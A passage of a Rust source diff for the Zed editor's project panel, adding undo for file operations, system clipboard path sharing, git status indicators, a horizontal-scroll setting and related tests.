edited_entry { + ProjectPanelOperation::Rename { + old_path: (worktree_id, old_entry.path).into(), + new_path: new_project_path, + } + } else { + ProjectPanelOperation::Create { + project_path: new_project_path, + } + }; + project_panel.undo_manager.record(operation); + } + cx.notify(); })?; @@ -2174,6 +2135,11 @@ impl ProjectPanel { } } + pub fn undo(&mut self, _: &Undo, _window: &mut Window, cx: &mut Context) { + self.undo_manager.undo(cx); + cx.notify(); + } + fn rename_impl( &mut self, selection: Option>, @@ -2361,6 +2327,7 @@ impl ProjectPanel { let project_path = project.path_for_entry(selection.entry_id, cx)?; dirty_buffers += project.dirty_buffers(cx).any(|path| path == project_path) as usize; + Some(( selection.entry_id, project_path.path.file_name()?.to_string(), @@ -2372,6 +2339,11 @@ impl ProjectPanel { } let answer = if !skip_prompt { let operation = if trash { "Trash" } else { "Delete" }; + let message_start = if trash { + "Do you want to trash" + } else { + "Are you sure you want to permanently delete" + }; let prompt = match file_paths.first() { Some((_, path)) if file_paths.len() == 1 => { let unsaved_warning = if dirty_buffers > 0 { @@ -2380,7 +2352,7 @@ impl ProjectPanel { "" }; - format!("{operation} {path}?{unsaved_warning}") + format!("{message_start} {path}?{unsaved_warning}") } _ => { const CUTOFF_POINT: usize = 10; @@ -2412,14 +2384,20 @@ impl ProjectPanel { }; format!( - "Do you want to {} the following {} files?\n{}{unsaved_warning}", - operation.to_lowercase(), + "{message_start} the following {} files?\n{}{unsaved_warning}", file_paths.len(), names.join("\n") ) } }; - Some(window.prompt(PromptLevel::Info, &prompt, None, &[operation, "Cancel"], cx)) + let detail = (!trash).then_some("This cannot be undone."); + Some(window.prompt( + PromptLevel::Info, + &prompt, + detail, + &[operation, "Cancel"], + cx, + )) } else { None }; @@ -2988,6 +2966,7 @@ impl ProjectPanel { fn cut(&mut self, _: &Cut, _: &mut Window, cx: &mut Context) { let 
entries = self.disjoint_effective_entries(cx); if !entries.is_empty() { + self.write_entries_to_system_clipboard(&entries, cx); self.clipboard = Some(ClipboardEntry::Cut(entries)); cx.notify(); } @@ -2996,6 +2975,7 @@ impl ProjectPanel { fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { let entries = self.disjoint_effective_entries(cx); if !entries.is_empty() { + self.write_entries_to_system_clipboard(&entries, cx); self.clipboard = Some(ClipboardEntry::Copied(entries)); cx.notify(); } @@ -3012,16 +2992,25 @@ impl ProjectPanel { if target_entry.is_file() || (target_entry.is_dir() && target_entry.id == source.entry_id) { new_path.pop(); } - let clipboard_entry_file_name = self + + let source_worktree = self .project .read(cx) - .path_for_entry(source.entry_id, cx)? - .path - .file_name()? - .to_string(); + .worktree_for_entry(source.entry_id, cx)?; + let source_entry = source_worktree.read(cx).entry_for_id(source.entry_id)?; + + let clipboard_entry_file_name = source_entry.path.file_name()?.to_string(); new_path.push(RelPath::unix(&clipboard_entry_file_name).unwrap()); - let extension = new_path.extension().map(|s| s.to_string()); - let file_name_without_extension = new_path.file_stem()?.to_string(); + + let (extension, file_name_without_extension) = if source_entry.is_file() { + ( + new_path.extension().map(|s| s.to_string()), + new_path.file_stem()?.to_string(), + ) + } else { + (None, clipboard_entry_file_name.clone()) + }; + let file_name_len = file_name_without_extension.len(); let mut disambiguation_range = None; let mut ix = 0; @@ -3057,6 +3046,17 @@ impl ProjectPanel { } fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + if let Some(external_paths) = self.external_paths_from_system_clipboard(cx) { + let target_entry_id = self + .selection + .map(|s| s.entry_id) + .or(self.state.last_worktree_root_id); + if let Some(entry_id) = target_entry_id { + self.drop_external_files(external_paths.paths(), entry_id, window, cx); + } 
+ return; + } + maybe!({ let (worktree, entry) = self.selected_entry_handle(cx)?; let entry = entry.clone(); @@ -3067,8 +3067,15 @@ impl ProjectPanel { .filter(|clipboard| !clipboard.items().is_empty())?; enum PasteTask { - Rename(Task>), - Copy(Task>>), + Rename { + task: Task>, + old_path: ProjectPath, + new_path: ProjectPath, + }, + Copy { + task: Task>>, + destination: ProjectPath, + }, } let mut paste_tasks = Vec::new(); @@ -3078,16 +3085,22 @@ impl ProjectPanel { let (new_path, new_disambiguation_range) = self.create_paste_path(clipboard_entry, self.selected_sub_entry(cx)?, cx)?; let clip_entry_id = clipboard_entry.entry_id; + let destination: ProjectPath = (worktree_id, new_path).into(); let task = if clipboard_entries.is_cut() { + let old_path = self.project.read(cx).path_for_entry(clip_entry_id, cx)?; let task = self.project.update(cx, |project, cx| { - project.rename_entry(clip_entry_id, (worktree_id, new_path).into(), cx) + project.rename_entry(clip_entry_id, destination.clone(), cx) }); - PasteTask::Rename(task) + PasteTask::Rename { + task, + old_path, + new_path: destination, + } } else { let task = self.project.update(cx, |project, cx| { - project.copy_entry(clip_entry_id, (worktree_id, new_path).into(), cx) + project.copy_entry(clip_entry_id, destination.clone(), cx) }); - PasteTask::Copy(task) + PasteTask::Copy { task, destination } }; paste_tasks.push(task); disambiguation_range = new_disambiguation_range.or(disambiguation_range); @@ -3098,26 +3111,44 @@ impl ProjectPanel { cx.spawn_in(window, async move |project_panel, mut cx| { let mut last_succeed = None; + let mut operations = Vec::new(); + for task in paste_tasks { match task { - PasteTask::Rename(task) => { + PasteTask::Rename { + task, + old_path, + new_path, + } => { if let Some(CreatedEntry::Included(entry)) = task .await .notify_workspace_async_err(workspace.clone(), &mut cx) { + operations + .push(ProjectPanelOperation::Rename { old_path, new_path }); last_succeed = Some(entry); } } - 
PasteTask::Copy(task) => { + PasteTask::Copy { task, destination } => { if let Some(Some(entry)) = task .await .notify_workspace_async_err(workspace.clone(), &mut cx) { + operations.push(ProjectPanelOperation::Create { + project_path: destination, + }); last_succeed = Some(entry); } } } } + + project_panel + .update(cx, |this, _| { + this.undo_manager.record_batch(operations); + }) + .ok(); + // update selection if let Some(entry) = last_succeed { project_panel @@ -3404,8 +3435,7 @@ impl ProjectPanel { _: &mut Window, cx: &mut Context, ) { - if let Some((worktree, entry)) = self.selected_sub_entry(cx) { - let path = worktree.read(cx).absolutize(&entry.path); + if let Some(path) = self.reveal_in_file_manager_path(cx) { self.project .update(cx, |project, cx| project.reveal_path(&path, cx)); } @@ -3762,6 +3792,65 @@ impl ProjectPanel { } Some((worktree, entry)) } + + fn reveal_in_file_manager_path(&self, cx: &App) -> Option { + if let Some((worktree, entry)) = self.selected_sub_entry(cx) { + return Some(worktree.read(cx).absolutize(&entry.path)); + } + + let root_entry_id = self.state.last_worktree_root_id?; + let project = self.project.read(cx); + let worktree = project.worktree_for_entry(root_entry_id, cx)?; + let worktree = worktree.read(cx); + let root_entry = worktree.entry_for_id(root_entry_id)?; + Some(worktree.absolutize(&root_entry.path)) + } + + fn write_entries_to_system_clipboard(&self, entries: &BTreeSet, cx: &mut App) { + let project = self.project.read(cx); + let paths: Vec = entries + .iter() + .filter_map(|entry| { + let worktree = project.worktree_for_id(entry.worktree_id, cx)?; + let worktree = worktree.read(cx); + let worktree_entry = worktree.entry_for_id(entry.entry_id)?; + Some( + worktree + .abs_path() + .join(worktree_entry.path.as_std_path()) + .to_string_lossy() + .to_string(), + ) + }) + .collect(); + if !paths.is_empty() { + cx.write_to_clipboard(ClipboardItem::new_string(paths.join("\n"))); + } + } + + fn 
external_paths_from_system_clipboard(&self, cx: &App) -> Option { + let clipboard_item = cx.read_from_clipboard()?; + for entry in clipboard_item.entries() { + if let GpuiClipboardEntry::ExternalPaths(paths) = entry { + if !paths.paths().is_empty() { + return Some(paths.clone()); + } + } + } + None + } + + fn has_pasteable_content(&self, cx: &App) -> bool { + if self + .clipboard + .as_ref() + .is_some_and(|c| !c.items().is_empty()) + { + return true; + } + self.external_paths_from_system_clipboard(cx).is_some() + } + fn selected_entry_handle<'a>( &self, cx: &'a App, @@ -4248,20 +4337,36 @@ impl ProjectPanel { return Ok(()); } - let task = worktree.update(cx, |worktree, cx| { - worktree.copy_external_entries(target_directory, paths, fs, cx) + let (worktree_id, task) = worktree.update(cx, |worktree, cx| { + ( + worktree.id(), + worktree.copy_external_entries(target_directory, paths, fs, cx), + ) }); let opened_entries: Vec<_> = task .await .with_context(|| "failed to copy external paths")?; - this.update(cx, |this, cx| { + this.update_in(cx, |this, window, cx| { + let mut did_open = false; if open_file_after_drop && !opened_entries.is_empty() { let settings = ProjectPanelSettings::get_global(cx); if settings.auto_open.should_open_on_drop() { this.open_entry(opened_entries[0], true, false, cx); + did_open = true; } } + + if !did_open { + let new_selection = opened_entries + .last() + .map(|&entry_id| (worktree_id, entry_id)); + for &entry_id in &opened_entries { + this.expand_entry(worktree_id, entry_id, cx); + } + this.marked_entries.clear(); + this.update_visible_entries(new_selection, false, false, window, cx); + } }) } .log_err() @@ -4340,9 +4445,13 @@ impl ProjectPanel { cx.spawn_in(window, async move |project_panel, cx| { let mut last_succeed = None; + let mut operations = Vec::new(); for task in copy_tasks.into_iter() { if let Some(Some(entry)) = task.await.log_err() { last_succeed = Some(entry.id); + operations.push(ProjectPanelOperation::Create { + 
project_path: (worktree_id, entry.path).into(), + }); } } // update selection @@ -4354,6 +4463,8 @@ impl ProjectPanel { entry_id, }); + project_panel.undo_manager.record_batch(operations); + // if only one entry was dragged and it was disambiguated, open the rename editor if item_count == 1 && disambiguation_range.is_some() { project_panel.rename_impl(disambiguation_range, window, cx); @@ -4403,6 +4514,23 @@ impl ProjectPanel { (info, folded_entries) }; + // Capture old paths before moving so we can record undo operations. + let old_paths: HashMap = { + let project = self.project.read(cx); + entries + .iter() + .filter_map(|entry| { + let path = project.path_for_entry(entry.entry_id, cx)?; + Some((entry.entry_id, path)) + }) + .collect() + }; + let destination_worktree_id = self + .project + .read(cx) + .worktree_for_entry(target_entry_id, cx) + .map(|wt| wt.read(cx).id()); + // Collect move tasks paired with their source entry ID so we can correlate // results with folded selections that need refreshing. 
let mut move_tasks: Vec<(ProjectEntryId, Task>)> = Vec::new(); @@ -4416,16 +4544,50 @@ impl ProjectPanel { return; } + let workspace = self.workspace.clone(); if folded_selection_info.is_empty() { - for (_, task) in move_tasks { - task.detach_and_log_err(cx); - } + cx.spawn_in(window, async move |project_panel, mut cx| { + let mut operations = Vec::new(); + for (entry_id, task) in move_tasks { + if let Some(CreatedEntry::Included(new_entry)) = task + .await + .notify_workspace_async_err(workspace.clone(), &mut cx) + { + if let (Some(old_path), Some(worktree_id)) = + (old_paths.get(&entry_id), destination_worktree_id) + { + operations.push(ProjectPanelOperation::Rename { + old_path: old_path.clone(), + new_path: (worktree_id, new_entry.path).into(), + }); + } + } + } + project_panel + .update(cx, |this, _| { + this.undo_manager.record_batch(operations); + }) + .ok(); + }) + .detach(); } else { - cx.spawn_in(window, async move |project_panel, cx| { + cx.spawn_in(window, async move |project_panel, mut cx| { // Await all move tasks and collect successful results let mut move_results: Vec<(ProjectEntryId, Entry)> = Vec::new(); + let mut operations = Vec::new(); for (entry_id, task) in move_tasks { - if let Some(CreatedEntry::Included(new_entry)) = task.await.log_err() { + if let Some(CreatedEntry::Included(new_entry)) = task + .await + .notify_workspace_async_err(workspace.clone(), &mut cx) + { + if let (Some(old_path), Some(worktree_id)) = + (old_paths.get(&entry_id), destination_worktree_id) + { + operations.push(ProjectPanelOperation::Rename { + old_path: old_path.clone(), + new_path: (worktree_id, new_entry.path.clone()).into(), + }); + } move_results.push((entry_id, new_entry)); } } @@ -4434,6 +4596,12 @@ impl ProjectPanel { return; } + project_panel + .update(cx, |this, _| { + this.undo_manager.record_batch(operations); + }) + .ok(); + // For folded selections, we need to refresh the leaf paths (with suffixes) // because they may not be indexed yet after the 
parent directory was moved. // First collect the paths to refresh, then refresh them. @@ -5189,6 +5357,10 @@ impl ProjectPanel { false } }; + let git_indicator = settings + .git_status_indicator + .then(|| git_status_indicator(details.git_status)) + .flatten(); let id: ElementId = if is_sticky { SharedString::from(format!("project_panel_sticky_item_{}", entry_id.to_usize())).into() @@ -5533,7 +5705,9 @@ impl ProjectPanel { }) .selectable(false) .when( - canonical_path.is_some() || diagnostic_count.is_some(), + canonical_path.is_some() + || diagnostic_count.is_some() + || git_indicator.is_some(), |this| { let symlink_element = canonical_path.map(|path| { div() @@ -5576,6 +5750,20 @@ impl ProjectPanel { }, ) }) + .when_some(git_indicator, |this, (label, color)| { + let git_indicator = if kind.is_dir() { + Indicator::dot() + .color(Color::Custom(color.color(cx).opacity(0.5))) + .into_any_element() + } else { + Label::new(label) + .size(LabelSize::Small) + .color(color) + .into_any_element() + }; + + this.child(git_indicator) + }) .when_some(symlink_element, |this, el| this.child(el)) .into_any_element(), ) @@ -6310,6 +6498,7 @@ impl Render for ProjectPanel { let panel_settings = ProjectPanelSettings::get_global(cx); let indent_size = panel_settings.indent_size; let show_indent_guides = panel_settings.indent_guides.show == ShowIndentGuides::Always; + let horizontal_scroll = panel_settings.scrollbar.horizontal_scroll; let show_sticky_entries = { if panel_settings.sticky_scroll { let is_scrollable = self.scroll_handle.is_scrollable(); @@ -6445,6 +6634,9 @@ impl Render for ProjectPanel { .on_action(cx.listener(Self::fold_directory)) .on_action(cx.listener(Self::remove_from_project)) .on_action(cx.listener(Self::compare_marked_files)) + .when(cx.has_flag::(), |el| { + el.on_action(cx.listener(Self::undo)) + }) .when(!project.is_read_only(cx), |el| { el.on_action(cx.listener(Self::new_file)) .on_action(cx.listener(Self::new_directory)) @@ -6459,11 +6651,14 @@ impl Render 
for ProjectPanel { el.on_action(cx.listener(Self::trash)) }) }) - .when(project.is_local(), |el| { - el.on_action(cx.listener(Self::reveal_in_finder)) - .on_action(cx.listener(Self::open_system)) - .on_action(cx.listener(Self::open_in_terminal)) - }) + .when( + project.is_local() || project.is_via_wsl_with_host_interop(cx), + |el| { + el.on_action(cx.listener(Self::reveal_in_finder)) + .on_action(cx.listener(Self::open_system)) + .on_action(cx.listener(Self::open_in_terminal)) + }, + ) .when(project.is_via_remote_server(), |el| { el.on_action(cx.listener(Self::open_in_terminal)) .on_action(cx.listener(Self::download_from_remote)) @@ -6679,10 +6874,14 @@ impl Render for ProjectPanel { }) }) .with_sizing_behavior(ListSizingBehavior::Infer) - .with_horizontal_sizing_behavior( - ListHorizontalSizingBehavior::Unconstrained, - ) - .with_width_from_item(self.state.max_width_item_index) + .with_horizontal_sizing_behavior(if horizontal_scroll { + ListHorizontalSizingBehavior::Unconstrained + } else { + ListHorizontalSizingBehavior::FitList + }) + .when(horizontal_scroll, |list| { + list.with_width_from_item(self.state.max_width_item_index) + }) .track_scroll(&self.scroll_handle), ) .child( @@ -6690,6 +6889,24 @@ impl Render for ProjectPanel { .id("project-panel-blank-area") .block_mouse_except_scroll() .flex_grow() + .on_scroll_wheel({ + let scroll_handle = self.scroll_handle.clone(); + let entity_id = cx.entity().entity_id(); + move |event, window, cx| { + let state = scroll_handle.0.borrow(); + let base_handle = &state.base_handle; + let current_offset = base_handle.offset(); + let max_offset = base_handle.max_offset(); + let delta = event.delta.pixel_delta(window.line_height()); + let new_offset = (current_offset + delta) + .clamp(&max_offset.neg(), &Point::default()); + + if new_offset != current_offset { + base_handle.set_offset(new_offset); + cx.notify(entity_id); + } + } + }) .when( self.drag_target_entry.as_ref().is_some_and( |entry| match entry { @@ -6825,13 
+7042,18 @@ impl Render for ProjectPanel { .size_full(), ) .custom_scrollbars( - Scrollbars::for_settings::() - .tracked_scroll_handle(&self.scroll_handle) - .with_track_along( - ScrollAxes::Horizontal, - cx.theme().colors().panel_background, - ) - .notify_content(), + { + let mut scrollbars = + Scrollbars::for_settings::() + .tracked_scroll_handle(&self.scroll_handle); + if horizontal_scroll { + scrollbars = scrollbars.with_track_along( + ScrollAxes::Horizontal, + cx.theme().colors().panel_background, + ); + } + scrollbars.notify_content() + }, window, cx, ) @@ -6859,14 +7081,17 @@ impl Render for ProjectPanel { Button::new("open_project", "Open Project") .full_width() .key_binding(KeyBinding::for_action_in( - &workspace::Open, + &workspace::Open::default(), &focus_handle, cx, )) .on_click(cx.listener(|this, _, window, cx| { this.workspace .update(cx, |_, cx| { - window.dispatch_action(workspace::Open.boxed_clone(), cx); + window.dispatch_action( + workspace::Open::default().boxed_clone(), + cx, + ); }) .log_err(); })), @@ -6903,7 +7128,7 @@ impl Render for ProjectPanel { .workspace .update(cx, |workspace, cx| { workspace.open_workspace_for_paths( - true, + OpenMode::Activate, external_paths.paths().to_owned(), window, cx, @@ -6980,17 +7205,8 @@ impl Panel for ProjectPanel { }); } - fn size(&self, _: &Window, cx: &App) -> Pixels { - self.width - .unwrap_or_else(|| ProjectPanelSettings::get_global(cx).default_width) - } - - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context) { - self.width = size; - cx.notify(); - cx.defer_in(window, |this, _, cx| { - this.serialize(cx); - }); + fn default_size(&self, _: &Window, cx: &App) -> Pixels { + ProjectPanelSettings::get_global(cx).default_width } fn icon(&self, _: &Window, cx: &App) -> Option { @@ -7029,7 +7245,7 @@ impl Panel for ProjectPanel { } fn activation_priority(&self) -> u32 { - 0 + 1 } } @@ -7096,5 +7312,30 @@ pub fn par_sort_worktree_entries_with_mode( entries.par_sort_by(|lhs, rhs| 
cmp_with_mode(lhs, rhs, &mode)); } +fn git_status_indicator(git_status: GitSummary) -> Option<(&'static str, Color)> { + if git_status.conflict > 0 { + return Some(("!", Color::Conflict)); + } + if git_status.untracked > 0 { + return Some(("U", Color::Created)); + } + if git_status.worktree.deleted > 0 { + return Some(("D", Color::Deleted)); + } + if git_status.worktree.modified > 0 { + return Some(("M", Color::Warning)); + } + if git_status.index.deleted > 0 { + return Some(("D", Color::Deleted)); + } + if git_status.index.modified > 0 { + return Some(("M", Color::Modified)); + } + if git_status.index.added > 0 { + return Some(("A", Color::Created)); + } + None +} + #[cfg(test)] mod project_panel_tests; diff --git a/crates/project_panel/src/project_panel_settings.rs b/crates/project_panel/src/project_panel_settings.rs index 0d703c55c06dfff2976fe59f6e030ad9eb1d758b..64f3ea42928399201c497ba58041ed0bf6ed5ba1 100644 --- a/crates/project_panel/src/project_panel_settings.rs +++ b/crates/project_panel/src/project_panel_settings.rs @@ -1,4 +1,4 @@ -use editor::EditorSettings; +use editor::{EditorSettings, ui_scrollbar_settings_from_raw}; use gpui::Pixels; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; @@ -36,6 +36,7 @@ pub struct ProjectPanelSettings { pub auto_open: AutoOpenSettings, pub sort_mode: ProjectPanelSortMode, pub diagnostic_badges: bool, + pub git_status_indicator: bool, } #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] @@ -49,6 +50,11 @@ pub struct ScrollbarSettings { /// /// Default: inherits editor scrollbar settings pub show: Option, + /// Whether to allow horizontal scrolling in the project panel. + /// When false, the view is locked to the leftmost position and long file names are clipped. 
+ /// + /// Default: true + pub horizontal_scroll: bool, } #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] @@ -75,9 +81,13 @@ impl AutoOpenSettings { } } -impl ScrollbarVisibility for ProjectPanelSettings { +#[derive(Default)] +pub(crate) struct ProjectPanelScrollbarProxy; + +impl ScrollbarVisibility for ProjectPanelScrollbarProxy { fn visibility(&self, cx: &ui::App) -> ShowScrollbar { - self.scrollbar + ProjectPanelSettings::get_global(cx) + .scrollbar .show .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } @@ -111,8 +121,12 @@ impl Settings for ProjectPanelSettings { auto_fold_dirs: project_panel.auto_fold_dirs.unwrap(), bold_folder_labels: project_panel.bold_folder_labels.unwrap(), starts_open: project_panel.starts_open.unwrap(), - scrollbar: ScrollbarSettings { - show: project_panel.scrollbar.unwrap().show.map(Into::into), + scrollbar: { + let scrollbar = project_panel.scrollbar.unwrap(); + ScrollbarSettings { + show: scrollbar.show.map(ui_scrollbar_settings_from_raw), + horizontal_scroll: scrollbar.horizontal_scroll.unwrap(), + } }, show_diagnostics: project_panel.show_diagnostics.unwrap(), hide_root: project_panel.hide_root.unwrap(), @@ -128,6 +142,7 @@ impl Settings for ProjectPanelSettings { }, sort_mode: project_panel.sort_mode.unwrap(), diagnostic_badges: project_panel.diagnostic_badges.unwrap(), + git_status_indicator: project_panel.git_status_indicator.unwrap(), } } } diff --git a/crates/project_panel/src/project_panel_tests.rs b/crates/project_panel/src/project_panel_tests.rs index af84a7f522a60abf2608bf1f3435b367d24f6bdc..55b53cde8b6252f8b9732cf4effc35ea53c073e0 100644 --- a/crates/project_panel/src/project_panel_tests.rs +++ b/crates/project_panel/src/project_panel_tests.rs @@ -4,7 +4,7 @@ use editor::MultiBufferOffset; use gpui::{Empty, Entity, TestAppContext, VisualTestContext}; use menu::Cancel; use pretty_assertions::assert_eq; -use project::FakeFs; +use project::{FakeFs, ProjectPath}; use 
serde_json::json; use settings::{ProjectPanelAutoOpenSettings, SettingsStore}; use std::path::{Path, PathBuf}; @@ -1635,7 +1635,10 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { "four.txt": "", } }, - "b": {} + "b": {}, + "d.1.20": { + "default.conf": "", + } }), ) .await; @@ -1688,6 +1691,7 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " three.txt", " one.txt", " two.txt", + " > d.1.20", ] ); @@ -1709,7 +1713,8 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " four.txt", " three.txt", " one.txt", - " two.txt" + " two.txt", + " > d.1.20", ] ); @@ -1732,7 +1737,8 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " four.txt", " three.txt", " one.txt", - " two.txt" + " two.txt", + " > d.1.20", ] ); @@ -1760,30 +1766,812 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " > inner_dir", " one.txt", " two.txt", + " > d.1.20", + ] + ); + + select_path(&panel, "root/d.1.20", cx); + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + assert_eq!( + visible_entries_as_strings(&panel, 0..50, cx), + &[ + // + "v root", + " > a", + " v b", + " v a", + " v inner_dir", + " four.txt", + " three.txt", + " one.txt", + " two.txt", + " v c", + " > a", + " > inner_dir", + " one.txt", + " two.txt", + " v d.1.20", + " default.conf", + " > [EDITOR: 'd.1.20 copy'] <== selected", + ], + "Dotted directory names should not be split at the dot when disambiguating" + ); +} + +#[gpui::test] +async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/test", + json!({ + "dir1": { + "a.txt": "", + "b.txt": "", + }, + "dir2": {}, + "c.txt": "", + "d.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + 
let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "test/dir1", cx); + + cx.simulate_modifiers_change(gpui::Modifiers { + control: true, + ..Default::default() + }); + + select_path_with_mark(&panel, "test/dir1", cx); + select_path_with_mark(&panel, "test/c.txt", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt", + " b.txt", + " > dir2", + " c.txt <== selected <== marked", + " d.txt", + ], + "Initial state before copying dir1 and c.txt" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); + }); + select_path(&panel, "test/dir2", cx); + panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + + toggle_expand_dir(&panel, "test/dir2/dir1", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt", + " b.txt", + " v dir2", + " v dir1 <== selected", + " a.txt", + " b.txt", + " c.txt", + " c.txt <== marked", + " d.txt", + ], + "Should copy dir1 as well as c.txt into dir2" + ); + + // Disambiguating multiple files should not open the rename editor. 
+ select_path(&panel, "test/dir2", cx); + panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt", + " b.txt", + " v dir2", + " v dir1", + " a.txt", + " b.txt", + " > dir1 copy <== selected", + " c.txt", + " c copy.txt", + " c.txt <== marked", + " d.txt", + ], + "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor" + ); +} + +#[gpui::test] +async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/test", + json!({ + "dir1": { + "a.txt": "", + "b.txt": "", + }, + "dir2": {}, + "c.txt": "", + "d.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "test/dir1", cx); + + cx.simulate_modifiers_change(gpui::Modifiers { + control: true, + ..Default::default() + }); + + select_path_with_mark(&panel, "test/dir1/a.txt", cx); + select_path_with_mark(&panel, "test/dir1", cx); + select_path_with_mark(&panel, "test/c.txt", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt <== marked", + " b.txt", + " > dir2", + " c.txt <== selected <== marked", + " d.txt", + ], + "Initial state before copying a.txt, dir1 and c.txt" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); + }); + select_path(&panel, "test/dir2", cx); + 
panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + + toggle_expand_dir(&panel, "test/dir2/dir1", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..20, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt <== marked", + " b.txt", + " v dir2", + " v dir1 <== selected", + " a.txt", + " b.txt", + " c.txt", + " c.txt <== marked", + " d.txt", + ], + "Should copy dir1 and c.txt into dir2. a.txt is already present in copied dir1." + ); +} + +#[gpui::test] +async fn test_undo_rename(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "a.txt": "", + "b.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root/a.txt", cx); + panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx)); + cx.run_until_parked(); + + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("renamed.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/renamed.txt", cx).is_some(), + "File should be renamed to renamed.txt" + ); + assert_eq!( + find_project_entry(&panel, "root/a.txt", cx), + None, + "Original file should no longer exist" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/a.txt", cx).is_some(), + 
"File should be restored to original name after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/renamed.txt", cx), + None, + "Renamed file should no longer exist after undo" + ); +} + +#[gpui::test] +async fn test_undo_create_file(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "existing.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root", cx); + panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx)); + cx.run_until_parked(); + + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("new.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/new.txt", cx).is_some(), + "New file should exist" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + find_project_entry(&panel, "root/new.txt", cx), + None, + "New file should be removed after undo" + ); + assert!( + find_project_entry(&panel, "root/existing.txt", cx).is_some(), + "Existing file should still be present" + ); +} + +#[gpui::test] +async fn test_undo_create_directory(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "existing.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let 
